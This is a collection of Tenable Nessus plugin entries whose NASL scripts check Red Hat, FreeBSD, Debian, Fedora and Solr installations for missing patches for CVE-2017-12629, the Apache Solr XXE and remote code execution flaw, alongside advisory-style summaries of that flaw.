code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2017:3123. The text # itself is copyright (C) Red Hat, Inc. # include("compat.inc"); if (description) { script_id(104457); script_version("3.12"); script_cvs_date("Date: 2019/10/24 15:35:43"); script_cve_id("CVE-2017-12629"); script_xref(name:"RHSA", value:"2017:3123"); script_xref(name:"IAVA", value:"2017-A-0319"); script_name(english:"RHEL 6 / 7 : JBoss EAP (RHSA-2017:3123)"); script_summary(english:"Checks the rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Red Hat host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "A security update is now available for Red Hat JBoss Enterprise Application Platform 7 for Red Hat Enterprise Linux 6 and 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. [Updated 6th November 2017] Previously, this erratum was marked as having a security impact of Critical. This was incorrect; Red Hat JBoss Enterprise Application Platform 7 was affected with a security impact of Moderate. This advisory has been updated to that effect. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This asynchronous patch is a security update for lucene package in Red Hat JBoss Enterprise Application Platform 7.0.8. Security Fix(es) : * It was found that Apache Lucene would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code if the server enabled Apache Solr's Config API. (CVE-2017-12629) For more information regarding CVE-2017-12629, see the article linked in the references section." ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/vulnerabilities/CVE-2017-12629" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/documentation/en-us/" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2017:3123" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2017-12629" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-analyzers-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-backward-codecs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-core"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-facet"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-misc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-queries"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-queryparser"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:eap7-lucene-solr"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/14"); script_set_attribute(attribute:"patch_publication_date", value:"2017/11/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/08"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! preg(pattern:"^(6\|7)([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 6.x / 7.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo"); if (!empty_or_null(yum_updateinfo)) { rhsa = "RHSA-2017:3123"; yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa); if (!empty_or_null(yum_report)) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : yum_report ); exit(0); } else { audit_message = "affected by Red Hat security advisory " + rhsa; audit(AUDIT_OS_NOT, audit_message); } } else { flag = 0; if (! (rpm_exists(release:"RHEL6", rpm:"jbossas-welcome-content-eap") \|\| rpm_exists(release:"RHEL7", rpm:"jbossas-welcome-content-eap"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, "JBoss EAP"); if (rpm_check(release:"RHEL6", reference:"eap7-lucene-analyzers-common-5.3.1-4.redhat_2.1.ep7.el6")) flag++; if (rpm_check(release:"RHEL6", reference:"eap7-lucene-backward-codecs-5.3.1-4.redhat_2.1.ep7.el6")) flag++; if (rpm_check(release:"RHEL6", reference:"eap7-lucene-core-5.3.1-4.redhat_2.1.ep7.el6")) flag++; if (rpm_check(release:"RHEL6", reference:"eap7-lucene-facet-5.3.1-4.redhat_2.1.ep7.el6")) flag++; if (rpm_check(release:"RHEL6", reference:"eap7-lucene-misc-5.3.1-4.redhat_2.1.ep7.el6")) flag++; if (rpm_check(release:"RHEL6", reference:"eap7-lucene-queries-5.3.1-4.redhat_2.1.ep7.el6")) flag++; if (rpm_check(release:"RHEL6", reference:"eap7-lucene-queryparser-5.3.1-4.redhat_2.1.ep7.el6")) flag++; if (rpm_check(release:"RHEL6", reference:"eap7-lucene-solr-5.3.1-4.redhat_2.1.ep7.el6")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-lucene-analyzers-common-5.3.1-4.redhat_2.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-lucene-backward-codecs-5.3.1-4.redhat_2.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-lucene-core-5.3.1-4.redhat_2.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-lucene-facet-5.3.1-4.redhat_2.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-lucene-misc-5.3.1-4.redhat_2.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-lucene-queries-5.3.1-4.redhat_2.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-lucene-queryparser-5.3.1-4.redhat_2.1.ep7.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"eap7-lucene-solr-5.3.1-4.redhat_2.1.ep7.el7")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "eap7-lucene-analyzers-common / eap7-lucene-backward-codecs / etc"); } }

NASL family	CGI abuses
NASL id	SOLR_7_1_0.NASL
description	The version of Apache Solr running on the remote web server is affected by multiple vulnerabilities as referenced in the advisory.
last seen	2020-06-01
modified	2020-06-02
plugin id	104353
published	2017-11-02
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/104353
title	Apache Solr 5.x < 5.5.5 / 6.x < 6.6.2 / 7.x < 7.1.0 Multiple Vulnerabilities
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(104353); script_version("1.6"); script_cvs_date("Date: 2019/11/12"); script_cve_id("CVE-2017-12629"); script_bugtraq_id(101261); script_xref(name:"IAVA", value:"2017-A-0319"); script_name(english:"Apache Solr 5.x < 5.5.5 / 6.x < 6.6.2 / 7.x < 7.1.0 Multiple Vulnerabilities"); script_summary(english:"Checks version of Solr"); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a Java application that is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Apache Solr running on the remote web server is affected by multiple vulnerabilities as referenced in the advisory."); script_set_attribute(attribute:"see_also", value:"http://lucene.apache.org/solr/news.html"); script_set_attribute(attribute:"see_also", value:"https://seclists.org/oss-sec/2017/q4/105"); # https://lucene.apache.org/core/5_5_5/changes/Changes.html#v5.5.5.bug_fixes script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?552cc7b7"); # https://lucene.apache.org/core/5_5_5/changes/Changes.html#v5.5.5.bug_fixeshttps://lucene.apache.org/core/6_6_2/changes/Changes.html#v6.6.2.bug_fixes script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?15df27f7"); # https://lucene.apache.org/core/5_5_5/changes/Changes.html#v5.5.5.bug_fixeshttps://lucene.apache.org/core/6_6_2/changes/Changes.html#v6.6.2.bug_fixeshttps://lucene.apache.org/core/7_1_0/changes/Changes.html#v7.1.0.bug_fixes script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f91188b1"); script_set_attribute(attribute:"solution", value: "Upgrade to Apache Solr version 5.5.5 / 6.6.2 / 7.1.0 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/17"); script_set_attribute(attribute:"patch_publication_date", value:"2017/10/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/02"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:solr"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("solr_detect.nbin"); script_require_keys("installed_sw/Apache Solr"); script_require_ports("Services/www", 8983); exit(0); } include("vcf.inc"); include("http.inc"); app = "Apache Solr"; get_install_count(app_name:app,exit_if_zero:TRUE); port = get_http_port(default:8983); app_info = vcf::get_app_info(app:app, port:port, webapp:TRUE); vcf::check_granularity(app_info:app_info, sig_segments:3); constraints = [ {"min_version" : "5.5.0", "max_version" : "5.5.4", "fixed_version" : "5.5.5" }, {"min_version" : "6.0.0", "max_version" : "6.6.1", "fixed_version" : "6.6.2" }, {"min_version" : "7.0.0", "max_version" : "7.0.1", "fixed_version" : "7.1.0" } ]; vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);

NASL family	FreeBSD Local Security Checks
NASL id	FREEBSD_PKG_E837390D0CEB46B89B3229C1195F5DC7.NASL
description	Solr developers report : Lucene XML parser does not explicitly prohibit doctype declaration and expansion of external entities which leads to arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions. Solr
last seen	2020-06-01
modified	2020-06-02
plugin id	103843
published	2017-10-16
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/103843
title	FreeBSD : solr -- Code execution via entity expansion (e837390d-0ceb-46b8-9b32-29c1195f5dc7)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from the FreeBSD VuXML database : # # Copyright 2003-2018 Jacques Vidrine and contributors # # Redistribution and use in source (VuXML) and 'compiled' forms (SGML, # HTML, PDF, PostScript, RTF and so forth) with or without modification, # are permitted provided that the following conditions are met: # 1. Redistributions of source code (VuXML) must retain the above # copyright notice, this list of conditions and the following # disclaimer as the first lines of this file unmodified. # 2. Redistributions in compiled form (transformed to other DTDs, # published online in any format, converted to PDF, PostScript, # RTF and other formats) must reproduce the above copyright # notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # include("compat.inc"); if (description) { script_id(103843); script_version("3.9"); script_cvs_date("Date: 2019/04/10 16:10:17"); script_cve_id("CVE-2017-12629"); script_xref(name:"IAVA", value:"2017-A-0319"); script_name(english:"FreeBSD : solr -- Code execution via entity expansion (e837390d-0ceb-46b8-9b32-29c1195f5dc7)"); script_summary(english:"Checks for updated packages in pkg_info output"); script_set_attribute( attribute:"synopsis", value: "The remote FreeBSD host is missing one or more security-related updates." ); script_set_attribute( attribute:"description", value: "Solr developers report : Lucene XML parser does not explicitly prohibit doctype declaration and expansion of external entities which leads to arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions. Solr 'RunExecutableListener' class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such listener can be enabled with any parameters just by using Config API with add-listener command." ); # http://lucene.472066.n3.nabble.com/Re-Several-critical-vulnerabilities-discovered-in-Apache-Solr-XXE-amp-RCE-td4358308.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?58e607db" ); script_set_attribute( attribute:"see_also", value:"https://marc.info/?l=apache-announce&m=150786685013286" ); # https://vuxml.freebsd.org/freebsd/e837390d-0ceb-46b8-9b32-29c1195f5dc7.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?74838017" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:apache-solr"); script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/13"); script_set_attribute(attribute:"patch_publication_date", value:"2017/10/13"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/10/16"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"FreeBSD Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info"); exit(0); } include("audit.inc"); include("freebsd_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD"); if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (pkg_test(save_report:TRUE, pkg:"apache-solr>=5.1<=6.6.1")) flag++; if (pkg_test(save_report:TRUE, pkg:"apache-solr>=7.0.0<7.1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");

NASL family	Debian Local Security Checks
NASL id	DEBIAN_DSA-4124.NASL
description	Two vulnerabilities have been found in Solr, a search server based on Lucene, which could result in the execution of arbitrary code or path traversal.
last seen	2020-06-01
modified	2020-06-02
plugin id	107024
published	2018-02-28
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/107024
title	Debian DSA-4124-1 : lucene-solr - security update
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DSA-4124. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(107024); script_version("3.5"); script_cvs_date("Date: 2019/04/05 23:25:05"); script_cve_id("CVE-2017-12629", "CVE-2017-3163"); script_xref(name:"DSA", value:"4124"); script_xref(name:"IAVA", value:"2017-A-0319"); script_name(english:"Debian DSA-4124-1 : lucene-solr - security update"); script_summary(english:"Checks dpkg output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Two vulnerabilities have been found in Solr, a search server based on Lucene, which could result in the execution of arbitrary code or path traversal." ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/source-package/lucene-solr" ); script_set_attribute( attribute:"see_also", value:"https://packages.debian.org/source/jessie/lucene-solr" ); script_set_attribute( attribute:"see_also", value:"https://packages.debian.org/source/stretch/lucene-solr" ); script_set_attribute( attribute:"see_also", value:"https://www.debian.org/security/2018/dsa-4124" ); script_set_attribute( attribute:"solution", value: "Upgrade the lucene-solr packages. For the oldstable distribution (jessie), these problems have been fixed in version 3.6.2+dfsg-5+deb8u1. For the stable distribution (stretch), these problems have been fixed in version 3.6.2+dfsg-10+deb9u1." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:lucene-solr"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:9.0"); script_set_attribute(attribute:"patch_publication_date", value:"2018/02/27"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/02/28"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"8.0", prefix:"liblucene3-contrib-java", reference:"3.6.2+dfsg-5+deb8u1")) flag++; if (deb_check(release:"8.0", prefix:"liblucene3-java", reference:"3.6.2+dfsg-5+deb8u1")) flag++; if (deb_check(release:"8.0", prefix:"liblucene3-java-doc", reference:"3.6.2+dfsg-5+deb8u1")) flag++; if (deb_check(release:"8.0", prefix:"libsolr-java", reference:"3.6.2+dfsg-5+deb8u1")) flag++; if (deb_check(release:"8.0", prefix:"solr-common", reference:"3.6.2+dfsg-5+deb8u1")) flag++; if (deb_check(release:"8.0", prefix:"solr-jetty", reference:"3.6.2+dfsg-5+deb8u1")) flag++; if (deb_check(release:"8.0", prefix:"solr-tomcat", reference:"3.6.2+dfsg-5+deb8u1")) flag++; if (deb_check(release:"9.0", prefix:"liblucene3-contrib-java", reference:"3.6.2+dfsg-10+deb9u1")) flag++; if (deb_check(release:"9.0", prefix:"liblucene3-java", reference:"3.6.2+dfsg-10+deb9u1")) flag++; if (deb_check(release:"9.0", prefix:"liblucene3-java-doc", reference:"3.6.2+dfsg-10+deb9u1")) flag++; if (deb_check(release:"9.0", prefix:"libsolr-java", reference:"3.6.2+dfsg-10+deb9u1")) flag++; if (deb_check(release:"9.0", prefix:"solr-common", reference:"3.6.2+dfsg-10+deb9u1")) flag++; if (deb_check(release:"9.0", prefix:"solr-jetty", reference:"3.6.2+dfsg-10+deb9u1")) flag++; if (deb_check(release:"9.0", prefix:"solr-tomcat", reference:"3.6.2+dfsg-10+deb9u1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2017-005F8F7F7D.NASL
description	Security fix for CVE-2017-12629 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2017-11-02
plugin id	104343
published	2017-11-02
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/104343
title	Fedora 25 : lucene (2017-005f8f7f7d)
code	#%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory FEDORA-2017-005f8f7f7d. # include("compat.inc"); if (description) { script_id(104343); script_version("3.9"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2017-12629"); script_xref(name:"FEDORA", value:"2017-005f8f7f7d"); script_xref(name:"IAVA", value:"2017-A-0319"); script_name(english:"Fedora 25 : lucene (2017-005f8f7f7d)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "Security fix for CVE-2017-12629 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bodhi.fedoraproject.org/updates/FEDORA-2017-005f8f7f7d" ); script_set_attribute( attribute:"solution", value:"Update the affected lucene package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:lucene"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:25"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/10/14"); script_set_attribute(attribute:"patch_publication_date", value:"2017/11/01"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/02"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! preg(pattern:"^25([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 25", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC25", reference:"lucene-5.5.0-5.fc25")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "lucene"); }

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2017-9B3E2904BF.NASL
description	Security fix for CVE-2017-12629 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2018-01-15
plugin id	105935
published	2018-01-15
reporter	This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/105935
title	Fedora 27 : lucene (2017-9b3e2904bf)

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2017-0929E71B41.NASL
description	Security fix for CVE-2017-12629 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2017-11-29
plugin id	104821
published	2017-11-29
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/104821
title	Fedora 26 : lucene4 (2017-0929e71b41)

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2017-F1535B86FA.NASL
description	Security fix for CVE-2017-12629 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2017-11-29
plugin id	104833
published	2017-11-29
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/104833
title	Fedora 25 : lucene4 (2017-f1535b86fa)

NASL family	Red Hat Local Security Checks
NASL id	REDHAT-RHSA-2018-0005.NASL
description	An update for eap7-jboss-ec2-eap is now available for Red Hat JBoss Enterprise Application Platform 7.0 for Red Hat Enterprise Linux 6 and Red Hat JBoss Enterprise Application Platform 7.0 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2). With this update, the eap7-jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 7.0.9. Refer to the JBoss Enterprise Application Platform 7.0.9 Release Notes, linked to in the References section, for information on the most significant bug fixes and enhancements included in this release. Security Fix(es) : * It was found that Apache Lucene would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code if the server enabled Apache Solr
last seen	2020-06-01
modified	2020-06-02
plugin id	105522
published	2018-01-04
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
